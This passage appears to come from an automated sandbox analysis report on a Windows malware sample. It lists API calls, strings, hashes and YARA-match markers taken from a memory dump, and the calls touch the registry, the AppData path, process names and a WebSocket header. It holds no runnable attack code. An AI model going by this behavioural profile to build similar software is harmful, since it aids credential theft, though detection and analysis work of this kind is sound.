                                • lstrlen.KERNEL32(00000000), ref: 01007F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01007F60
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01007FA5
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01007FD3
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01008007
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: a803473a8af664daaae8dd71c44de4f016fb978d9a88962914d22d6b620bd6d9
                                • Instruction ID: a850ef3a3cd93341884756bab6db116e771e09369b850817964e416b43722dbc
                                • Opcode Fuzzy Hash: a803473a8af664daaae8dd71c44de4f016fb978d9a88962914d22d6b620bd6d9
                                • Instruction Fuzzy Hash: 5341893050011ADFEB22DF68D484AAEBBF4FF44340F11409DE986DB295DB78AA61CB91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 010080BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010080EA
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 01008102
                                • lstrlen.KERNEL32(00000000), ref: 01008140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100816F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 85ed84d4bd2f6cc1a3d318ecba795ccf4665bce64447f3f7b29e470834b66a46
                                • Instruction ID: 9653c3e102f4dd542c5b3841cdc8237d520f160503176bde1807b1ebd858f181
                                • Opcode Fuzzy Hash: 85ed84d4bd2f6cc1a3d318ecba795ccf4665bce64447f3f7b29e470834b66a46
                                • Instruction Fuzzy Hash: A4417171900106ABEB62DF6CD948BAEBBF8FF44700F10855EEA85D7295EB34D941CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01013166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B938,00000000,00020119,?), ref: 0101318C
                                • RegQueryValueExA.ADVAPI32(?,00D6DC70,00000000,00000000,00000000,000000FF), ref: 010131A7
                                • RegCloseKey.ADVAPI32(?), ref: 010131B1
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 67f483bc038ddf6b3236999a984a460a851fa9c45876c7e50615966d7201d22b
                                • Instruction ID: 0bfe1801d91b170010882b07c630fef0bea8fb0fb67cec7b24474241fdbcf1bf
                                • Opcode Fuzzy Hash: 67f483bc038ddf6b3236999a984a460a851fa9c45876c7e50615966d7201d22b
                                • Instruction Fuzzy Hash: CE118272A00218BFD720CF98E849FAFBBBCF744720F004119FA05D3644D774590087A0
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8996
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1D5
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF89CD
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: b95d987eeb42e18a8d50b754d7e661309250aabc8b8dfbe8454969ad8b195d47
                                • Instruction ID: 2989033fd14bfd5bc5ed24f11214a6753467618d990c20997091d32682565ec2
                                • Opcode Fuzzy Hash: b95d987eeb42e18a8d50b754d7e661309250aabc8b8dfbe8454969ad8b195d47
                                • Instruction Fuzzy Hash: B921D8323006549BCB319A5CE840A7AF795DFA17E1B11093FE281CB260CBB5DC42D3A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8883
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: fea21b87694ab7897c7f88e3ff5b08613f7fcd2e8ed5d728d9070e793073916a
                                • Instruction ID: 737f1392eca85006a743c323d4b9df2d84aeb6bc7d91a06bef868e17c582c6be
                                • Opcode Fuzzy Hash: fea21b87694ab7897c7f88e3ff5b08613f7fcd2e8ed5d728d9070e793073916a
                                • Instruction Fuzzy Hash: 7A31A9B5E005199FCB08DF58C8916ADBBB6EF88350F148269EA15EF354DB34AD01CBD1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015922
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015935
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 83dabfcd0b57a7cee5da9d5449f6cb7a2c8eca2a6914a5fca78ba25b8fa1f5d9
                                • Instruction ID: 7abbb06643c51b99a4033dc815d5959b6135b35ddfb56e53e8fe52f2cb2f6850
                                • Opcode Fuzzy Hash: 83dabfcd0b57a7cee5da9d5449f6cb7a2c8eca2a6914a5fca78ba25b8fa1f5d9
                                • Instruction Fuzzy Hash: 861182303147508BC7328B2CEC0075A7BE2ABD7670F150A9EE1D1CF699D769D841C7A2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0101A430,000000FF), ref: 01013D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01013D27
                                • wsprintfA.USER32 ref: 01013D37
                                  • Part of subcall function 010171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 010171FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: f892063df0b92b0a02b9d35485f3cb9c4c384b1a4d39b1c0d416f7c6123ceca8
                                • Instruction ID: 52152dad0dcc86fe4c15a06ca83ac21a7470b23b5980922245338bb584e7d717
                                • Opcode Fuzzy Hash: f892063df0b92b0a02b9d35485f3cb9c4c384b1a4d39b1c0d416f7c6123ceca8
                                • Instruction Fuzzy Hash: 20018071640328BBEB305F55EC4EF6EBBB8FB45B65F000115FA059B284DBB85A00C7A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00FF8737
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: e5ae741e6b2743760c0e89d4c2623cf10359e052185580fff2374a3ac0f95148
                                • Instruction ID: 60f5f89196fd984e9c9cffafa00c2f62be848b3d66adadb9825d1e3f57a03a02
                                • Opcode Fuzzy Hash: e5ae741e6b2743760c0e89d4c2623cf10359e052185580fff2374a3ac0f95148
                                • Instruction Fuzzy Hash: 81F09027F000260F8314743D8D855AEA9465AE52E033AD725EA5AEF269DC71EC83A5D4
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E573
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E581
                                • lstrcat.KERNEL32(?,00D6D9B0), ref: 0100E59C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 82f54a18b62bf205828ce9dec4da694f616e413663cf56767be3a7e5421e19e6
                                • Instruction ID: a1f42df98a5dc552625ceb9855cccf845c417f1386fb65fbb99250c78b936182
                                • Opcode Fuzzy Hash: 82f54a18b62bf205828ce9dec4da694f616e413663cf56767be3a7e5421e19e6
                                • Instruction Fuzzy Hash: 1B518171A1010CAFDB65EF54EC46EFE33B9AF58300F444898FA0597295EB74EE849B90
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 01011FDF, 01011FF5, 010120B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 444f327a5d150f739d3aa00bf14bf352cd05c938e05c7a32e70a45ca0a48b619
                                • Instruction ID: 117bfb67891e17ef1835cae2a46c2a9b91c2425facb0b5f20b72be98376d6b48
                                • Opcode Fuzzy Hash: 444f327a5d150f739d3aa00bf14bf352cd05c938e05c7a32e70a45ca0a48b619
                                • Instruction Fuzzy Hash: 5D217E355102898FD721DA79C4447DDF7A7DF80361FA44296E8984B28BE33A190AC796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 0100EBF1
                                • lstrcat.KERNEL32(?,00D6ED00), ref: 0100EC0C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ff3866f69346d7f4e4b05dd3d9d94301f78f5fd6e4387fe26e5a7c8f242398a3
                                • Instruction ID: d4fa0820fec6cbd60bd4cd08bdad3f8884202409dfd635a82aae7dc4bc866ff8
                                • Opcode Fuzzy Hash: ff3866f69346d7f4e4b05dd3d9d94301f78f5fd6e4387fe26e5a7c8f242398a3
                                • Instruction Fuzzy Hash: 66317471A1011CABDB71EF64EC45BEE77B4AF58300F1014A8FB16A7290DB789E849B90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0101A3D0,000000FF), ref: 01012B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01012B96
                                • GetLocalTime.KERNEL32(?,?,00000000,0101A3D0,000000FF), ref: 01012BA2
                                • wsprintfA.USER32 ref: 01012BCE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 32dd192bd288898f25d12d7f1e80a98f46a5161ca3d80a585828251423158a2d
                                • Instruction ID: 29cba3c68e6655fcdac5e17c502ddc10a3e1e9bb324907068f569cd9a4d8e909
                                • Opcode Fuzzy Hash: 32dd192bd288898f25d12d7f1e80a98f46a5161ca3d80a585828251423158a2d
                                • Instruction Fuzzy Hash: 5D012DB2904128BBCB249FC9AD49FBEB7BCFB4CA11F00411AF605A2284E67C5540C7B5
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 01014492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 010144AD
                                • CloseHandle.KERNEL32(00000000), ref: 010144B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 010144E7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: c7c57761491536bfec0fa7509cbc2f16765c548e2cb7363f0f498c7fe1b655f4
                                • Instruction ID: 83563d103c887865707686bcecdafa8cd4e0abfe27185e1560d25dc5c8133f54
                                • Opcode Fuzzy Hash: c7c57761491536bfec0fa7509cbc2f16765c548e2cb7363f0f498c7fe1b655f4
                                • Instruction Fuzzy Hash: 2DF0C8B09416253BFB319F78AC4DBEA7AE8AF14704F000590EB89D7184DBB889C48794
                                APIs
                                • __getptd.LIBCMT ref: 01018FDD
                                  • Part of subcall function 010187FF: __amsg_exit.LIBCMT ref: 0101880F
                                • __getptd.LIBCMT ref: 01018FF4
                                • __amsg_exit.LIBCMT ref: 01019002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 01019026
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 0c14f3ae60d2212264a3c3b092b949144fb9eb3a55ddd940a83b26d0a4f0a4f0
                                • Instruction ID: 4044c6e5c5d5b7c73a5361f678f7e2b56fed8fb2a845973131236452d8828686
                                • Opcode Fuzzy Hash: 0c14f3ae60d2212264a3c3b092b949144fb9eb3a55ddd940a83b26d0a4f0a4f0
                                • Instruction Fuzzy Hash: 2DF090329446219FDB62BB7C980179D37A07F20724F24815EE6C4AA1C8DF6C9600DA99
                                APIs
                                • lstrlen.KERNEL32(------,00FF5BEB), ref: 0101731B
                                • lstrcpy.KERNEL32(00000000), ref: 0101733F
                                • lstrcat.KERNEL32(?,------), ref: 01017349
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 25c20b06c2c1af7e38d5bee2944c358c63b9e61ae0ba5cfb18c31893968f52e4
                                • Instruction ID: c2646f2ede978f548747470b04d1b9779dac83602edad73a6382fd5a83ef3a28
                                • Opcode Fuzzy Hash: 25c20b06c2c1af7e38d5bee2944c358c63b9e61ae0ba5cfb18c31893968f52e4
                                • Instruction Fuzzy Hash: 0DF030745003029FEB749F39E84D926BBF8EF44600718985DA8DAC7218E738D440CB10
                                APIs
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003422
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003471
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003497
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 7e6986d309e17f6fbc98237ba720714069940de55eca91f11c410ae9a1df7040
                                • Instruction ID: e816acbff104af26641a498f922ef55964f0153c12092538580b6fa38802a7b8
                                • Opcode Fuzzy Hash: 7e6986d309e17f6fbc98237ba720714069940de55eca91f11c410ae9a1df7040
                                • Instruction Fuzzy Hash: B812F974A012118FEB6ACF1DD558A25BBE4BF44318F29C0EED5499F3A2D772E842CB40
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007CAF
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D58
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D76
                                  • Part of subcall function 01007D40: std::_Xinvalid_argument.LIBCPMT ref: 01007D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: d84f21dffa9b440d8f3995165d215b6b996480e3defc4ac55117082d4b9ba743
                                • Instruction ID: e3018aa9738a39cfde955db63ef214d284fef17302dcfd499f52bd83d86b160a
                                • Opcode Fuzzy Hash: d84f21dffa9b440d8f3995165d215b6b996480e3defc4ac55117082d4b9ba743
                                • Instruction Fuzzy Hash: 1D310A723002188BF3269D6CE880DAAF7E5DF91660F24462FE6C1CB6C1C775BC4183A5
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00FF6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 066bb044216a9e03a3f486c4897868180c25cca838b0763c255739d3012e9b6e
                                • Instruction ID: 707cab696438129ef1e683604d626c998ae7bacb378715215152ee6eb965e2a8
                                • Opcode Fuzzy Hash: 066bb044216a9e03a3f486c4897868180c25cca838b0763c255739d3012e9b6e
                                • Instruction Fuzzy Hash: E0218170A007059BDB208F24DC85BBA73A8EF40704F444968FA46CB6D5FB79E945D750
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 010115A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 010115D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011611
                                • lstrcpy.KERNEL32(00000000,?), ref: 01011649
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 88560b037871d145349a856c5c5897e833c1b5f6967ac69f43d590788971da5c
                                • Instruction ID: f25683b4907401eaa0dbd553cf81c1423dcd588ebddc64500d7e99451eeabdb7
                                • Opcode Fuzzy Hash: 88560b037871d145349a856c5c5897e833c1b5f6967ac69f43d590788971da5c
                                • Instruction Fuzzy Hash: BA210C74601B029BEB78DF7AD858A27BBF8AF44700B04491CE6D6C7A44DB78E841DB90
                                APIs
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000), ref: 00FF162D
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF164F
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF1671
                                  • Part of subcall function 00FF1610: lstrcpy.KERNEL32(00000000,?), ref: 00FF1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 5387ddccc4593ada97eacc63b0ecaebdbba700c15543c42ef7d22a0cf2252024
                                • Instruction ID: d5ba9a56cb7be727e1e0713fefbcff3930d2582086a911a59274e328a83e4b15
                                • Opcode Fuzzy Hash: 5387ddccc4593ada97eacc63b0ecaebdbba700c15543c42ef7d22a0cf2252024
                                • Instruction Fuzzy Hash: 8731D674A01B06EFCB28DF3AD588966BBE5BF48714704492DE996C3B20DB74F851DB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00FF162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1693
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 488ebe9569e7d46ca20e274dc56c94e621409cacc1dec84afb1c841aab2f2b78
                                • Instruction ID: c4726a9ee6d579fc3eb78569bfd2002fe0e57640b16b08398ba8ad9ef886f9f1
                                • Opcode Fuzzy Hash: 488ebe9569e7d46ca20e274dc56c94e621409cacc1dec84afb1c841aab2f2b78
                                • Instruction Fuzzy Hash: 60114C74A11B06ABCB349F36D45C936B7F8BF44711B08052DE98AC7A50EB34E841DB90